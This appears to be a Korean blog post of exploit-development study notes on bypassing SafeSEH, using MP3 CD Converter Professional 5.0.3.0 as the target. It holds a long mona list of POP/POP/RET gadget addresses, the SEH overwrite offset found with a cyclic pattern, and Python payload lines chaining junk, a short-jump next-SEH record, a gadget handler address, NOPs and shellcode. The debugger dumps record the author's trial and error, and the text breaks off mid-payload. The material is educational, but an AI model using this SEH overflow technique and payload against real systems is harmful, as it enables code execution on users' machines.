2018. 1. 9. 21:51ㆍ0x04 pwnable/윈도우즈 어플리케이션 취약점 분석
SafeSEH : SafeSEH는 SEH 기반 공격 시도를 실시간으로 차단해준다.
/safeSEH 컴파일러 스위치를 모든 실행 가능한 모듈에 적용할 수 있다.
스택을 보호하는 대신 예외 핸들러 프레임 체인이 보호되는데, 만약 SEH 체인이 변조되면 애플리케이션은
감염된 핸들러로 점프하지 않고, 종료된다. SafeSEH는 예외 핸들링 체인이 실제 핸들러로 이동하기 전에
변조 여부를 검사한다.
버그 바운티 팁이라고도 볼 수 있겠다.
취약한 애플리케이션이 SafeSEH로 컴파일 되지 않았거나 로드 된 모듈들 중 하나 이상이
SafeSEH로 컴파일 되어 있지 않은 경우,
해당 모듈 또는 애플리케이션 "DLL 파일"에서 POP/POP/RET
주소를 가져온다.
Garget : pop pop ret , call ebp + 0x30,
!mona mod
mona를 통해 보호 기법의 유무를 알 수 있다.
SHE4 StackLayer
ESP + 0x8 : POP POP RET
CALL EBP + 0x30
얘내들을 사용하는 이유 ?
예외가 발생했을 경우 seh 구조체를 들어가면 핸들러가 있다.
seh 체인을 잘 봐야한다.
call과 jmp명령어는 최소 5바이트는 사용한다.
CALL이나 JMP는 절대주소를 이용하고
SHORT JMP는 상대주소를 이용하게 되면서, 명령어 OPCODE는 \xEB
\xEB 00~7F (양수) - 스택 앞으로 JMP
\xEB 80~FF (음수) - 스택 뒤로 JMP
SafeSEH 우회 방법은 3가지가 있다.
1가지 : 프로그램에서 로드 된 모듈 중 SafeSEH가 적용되지 않는 모듈이 있다면 예외 처리 핸들러는 호출됨
2가지 : 예외 처리 핸들러의 주소가 힙 주소로 덮어씌워져 있다면 예외 처리 핸들러는 호출됨
3가지 : 예외 처리 핸들러의 주소가 프로그램에서 로드 된 모듈이 아닌 다른 메모리 영역의 모듈 주소를 가리키고 있다면
예외 처리 핸들러는 호출됨
call dword ptr [esp+n]
jmp dword ptr [esp+n]
call dword ptr [ebp+n]
jmp dword ptr [ebp+n]
call dword ptr [ebp-n]
jmp dword ptr [ebp-n]
call dword ptr [esp-n]
jmp dword ptr [esp-n]
esp-16, esp+8, esp+16, esp+1c, esp+2c, esp+32, esp+40 etc
ebp-18
MP3CDConverter
ollydbg 에서 Ctrl+S 해서 가젯을 찾는다.
가젯
POP R32
POP R32
RET
CALL EBP+0x30 찾는법
call dword ptr ss: [ebp+0x30]으로 찾음
CTRL +B(Binary) -> FF 55 30
Immunity Debugger - mona.py
특정 바이너리 attach 후 !mona seh 하고 log data를 보면 사용할 수 있는 것들이 출력됨
정확하게 모든 것을 다 보려면 Immunity Debugger 경로에 seh.txt를 보면 됨
너무 많다.
0x0040793f : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0040794a : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00407a9d : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00407ab3 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00407ac0 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0040d167 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0040d16e : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0040d1b8 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00412ffb : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0041364e : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0042116c : pop edi # pop esi # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00423ac4 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00425f40 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00428e1a : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0042909d : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00431c5d : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0043237b : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00432f9e : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00433372 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x004335fc : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00434e3e : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00436b25 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x004385de : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x004392c9 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0043bbb0 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00445c38 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00445f06 : pop edi # pop esi # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044734a : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x004476b9 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00447f34 : pop edi # pop esi # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044c979 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044d27c : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044e38d : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044ef05 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00450404 : pop edi # pop esi # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045124e : pop edi # pop esi # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00452ff7 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00453033 : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii,alphanum,uppernum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045a0aa : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045a4a7 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045a6a5 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045aa55 : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0045c19b : pop edi # pop esi # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x10002581 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x1000259d : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10002ece : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x100045f7 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10004607 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10005f43 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10006c7e : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10006c86 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x10008c05 : pop edi # pop esi # ret 0x04 | null {PAGE_EXECUTE_READ} [id3lib.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\MP3 CD Converter Professional\id3lib.dll)
0x00416a7f : pop esi # pop ebx # ret 0x04 | startnull,ascii {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00416aa6 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00416ab2 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0041922a : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0041d273 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00426f6d : pop esi # pop ebx # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00426f77 : pop esi # pop ebx # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00431680 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x00436263 : pop esi # pop ebx # ret 0x04 | startnull,asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044b7b7 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044bfe6 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044bff3 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044c000 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044c00d : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044c01a : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044c39b : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
0x0044e401 : pop esi # pop ebx # ret 0x04 | startnull {PAGE_EXECUTE_READ} [MP3CDConverterPro.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0 (C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
사용 시 주의 할 점 : 반드시 SafeSEH가 false여야 한다.
0x0040793f : pop edi # pop esi # ret 0x04 | startnull,asciiprint,ascii
{PAGE_EXECUTE_READ} [MP3CDConverterPro.exe]
ASLR: False, Rebase: False, SafeSEH: False, OS: False, v5.0.3.0
(C:\Program Files\MP3 CD Converter Professional\MP3CDConverterPro.exe)
얘를 사용할 것이다.
배운 내용
GS로 인하여 기존의 RET를 변조하는 방식의 공격이 불가능하다.
SEH 구조체는 Stack에 위치하여 공략 가능
SafeSEH가 등록되어 있기 때문에 pop/pop/ret나 call ebp+0x30을 실행하여 우회
해당 가젯 수집 방법 (pop/pop/ret , call ebp+0x30)
Short JMP 기계어 코드 -> relative address
상대주소에서 00~7F (스택 위)
상대주소에서 80~FF (스택 밑)
아까 만든 INT3 프로그램을 들어가서 SEH 핸들러를 살펴보자.
우선, 프로그램에 INT3이 걸려있기 때문에 그 다음 주소인 00401040이 EIP로 되어있다.
(shift + F9)
스택을 살펴보면 다음과 같다.
0012FF68 0012FFB0 Pointer to next SEH record
0012FF6C 00401785 SE handler
스택을 풀이해보면 다음과 같다.
0012FF6C에는 SE handler가 있고, 0012FF68에는 Pointer to next SEH record가 존재함
그럼 우리는 아까전에 배운 safe seh우회를 생각해보면,
pop / pop/ ret -> pop32 pop32 ret -> esp+0x8
call dword ptr ss: ebp+0x30 가 된다.
실습
MP3 CD Converter
6000바이트 페이로드를 구한다.
원래 가지고 있는 패턴이 10000바이트이기 때문에 [:6000]하면 6000바이트까지 파일에 쓸 수 있다.
그 후 MP3 CD Converter Attach
SEH Handler : 61423161 패턴이 들어갔다.
이 패턴의 위치를 Immunity Debugger를 통해 확인
명령어:
!mona pattern_offset 61423161
Log data, item 9
Address=0BADF00D
Message= - Pattern a1Ba (0x61423161) found in cyclic pattern at position 784
784바이트에 offset이 위치한다.
그렇다면, 6000바이트 파일에 784바이트에 SEH Handler가 위치한다.
내가 쓸 가젯의 주소는 0x00407A9D이다. (Safe SEH : False) 되어있어야 한다.
next는 4바이트 앞이기 때문에 780바이트에 존재한다.
다시 payload를 짜면
seh_next = struct.pack('<L',0xFFFFFFFF) # SEH_NEXT
seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
복습 : POP POP RET 찾는 법
Immunity debugger에 바이너리 attach 후 !mona seh
attach 후 SEH Handler 보면
seh_handler location = 00100544
00407A9D
지금 짯을 때 seh_next가 0xFFFFFFF로 덮여있어서 올바르게 PWN이 안 된것 같은데
이를 0x90으로 하면 어떨까?
seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
아... seh_next에 하는게 아닌가?
강의를 보고 진행해보자.
그런데 지금 스택을 보게 되면, seh_handler 뒤에 buf가 나와야 하는데 0xFFFFFFFF가 들어있음을 볼 수 있다.
밥먹고 왔으니 복습.
seh handler의 offset : 00100544 -> 00407A90을 가리킴
00407A90을 확인 했는데 그 밑의 스택에 FF FF FF FF 가 담겨있다. buf에 FF FF FF FF 는 없다.
단순한 에러일까?
00100534 41414141
00100538 41414141
0010053C 41414141
00100540 41414141
00100544 FFFFFFFF End of SEH chain
00100548 00407A9D SE handler
0010054C FFFFFFFF
00100550 5EF472D9
00100554 49495956
00100558 49494949
0010055C 49494949
00100560 43434343
00100564 51374343
00100568 58416A5A
0010056C 30413050
FF FF FF FF 를 패치해야한다 ! 즉, 피해야 한다.
피하는 방법은 0x90 으로 하면 된다.
우선, pop pop ret에 bp를 걸고 핸들러가 가리키는 주소에 bp를 건다.
그 후 핸들러가 가리키는 주소 (FF FF가 현재 들어있는데)의 OPCODE를 EB 10으로 패치한다. !!
seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT (Short JMP)
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
nop은 조금 넉넉하게 ~
얘내를 점프해야함 .
//
0010054B 00FF ADD BH,BH
0010054D FFFF ??? ; Unknown command
0010054F FFD9 CALL FAR ECX ; Illegal use of register
//
어차피 f.write(payload(:6000))에서 6000바이트로 짜름
seh_next = struct.pack('<L',0x909010EB) # SEH_NEXT (Short JMP)
seh_handler = struct.pack('<L',0x00407A9D) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + "\x90" * 15 + buf + "B" * 6000
아.. seh_handler를 여기만 적어두고, XP환경에는 안바꾸었구나
이제 내 아이디어로 문제를 다시 풀어보자. 정답이 하나만 있진 않을거잖아?
우선 seh_handler를 구하기 위해 가젯을 획득한다.
가젯은 POP POP RET다.
해당 가젯을 찾기 위해 MP3 CD Converter 프로그램을 로드하고, Immunity Debugger를 통해
해당 명령어를 입력한다 => !mona seh
그러면 엄청 나게 많은 POP POP RET가 나오게 되는데 0x0040793f를 이용해보자.
# my_idea
seh_next = struct.pack('<L',0x90909090) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
이렇게 코드를 짜고 SEH Chain을 보게 되면
주소 0x00100544에 0040793F를 가리키게 된다.
즉 내가 적은 POP POP RET가 제대로 들어가 있음을 확인하였고,
주소 0x00100544를 스택으로 확인해보았다.
A가 여러개 들어가있고 (780개) SEH_NEXT
내가 입력한 seh_next와 seh_handler 까지 보인다.
seh_next = 90909090
seh_handler = 0040793F
00100538 41414141
0010053C 41414141
00100540 41414141
00100544 90909090 Pointer to next SEH record
00100548 0040793F SE handler
0010054C FFFFFFFF
00100550 5EF472D9
00100554 49495956
00100558 49494949
0010055C 49494949
00100560 43434343
00100564 51374343
그런데... 0010054C에 FF FF FF FF 라는 이상한 값이 들어가 있다.
그렇다면.. 40793F로 이동해서 BP걸고 . 0010054C에도 BP걸고 확인하자.
이 FF FF 에 Jmp short 를 이용해서 우회를 해야한다.
일단 49 43 중에 아무곳이나 점프할 곳을 찾는다
나는 0X10055F가 마음에 든다.
0010054C /EB 11 JMP SHORT 0010055F
0010054E |FFFF ??? ; Unknown command
00100550 |D972 F4 FSTENV (28-BYTE) PTR DS:[EDX-C]
00100553 |5E POP ESI
00100554 |56 PUSH ESI
00100555 |59 POP ECX
00100556 |49 DEC ECX
00100557 |49 DEC ECX
00100558 |49 DEC ECX
00100559 |49 DEC ECX
0010055A |49 DEC ECX
0010055B |49 DEC ECX
0010055C |49 DEC ECX
0010055D |49 DEC ECX
0010055E |49 DEC ECX
0010055F \49 DEC ECX
앗.. 잘못 했다. Next SEH에서 패치를 진행해야하는 것 같다.
다시 00100544로 이동해서 0x10055F에 JMP SHORT
00100544 /EB 19 JMP SHORT 0010055F
00100546 |90 NOP
00100547 |90 NOP
00100548 |3F AAS
00100549 |79 40 JNS SHORT 0010058B
0010054B |00FF ADD BH,BH
0010054D |FFFF ??? ; Unknown command
0010054F |FFD9 CALL FAR ECX ; Illegal use of register
00100551 ^|72 F4 JB SHORT 00100547
00100553 |5E POP ESI
00100554 |56 PUSH ESI
00100555 |59 POP ECX
00100556 |49 DEC ECX
00100557 |49 DEC ECX
00100558 |49 DEC ECX
00100559 |49 DEC ECX
0010055A |49 DEC ECX
0010055B |49 DEC ECX
0010055C |49 DEC ECX
0010055D |49 DEC ECX
0010055E |49 DEC ECX
0010055F \49 DEC ECX
그렇다면, next SEH를 바꿔줘야지
# my_idea
seh_next = struct.pack('<L',0x0010055F) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
# pop pop ret => !mona seh => must safe SEH = failed
seh_handler = struct.pack('<L',0x0040793f) # SEH_HANDLER => POP POP RET
payload = "A" * (784-4) + seh_next + seh_handler + buf + "B" * 6000
nop없이 한번 진행해보자. 왜 nop을 쓰는지 알고싶기 때문이다.
FF FF 에서 막혀버린다. 그래서 BAD CODE라고 하나보다.
그렇다면 다시 페이로드를 짜보자.
0x0010055f로 가려면 0x90이 20개 있어야 한다.
# my_idea
seh_next = struct.pack('<L',0x0010055F) # SEH_NEXT
#seh_handler = struct.pack('<L',0xFFFFFFFF) # SEH_HANDLER
# pop pop ret == seh_handler
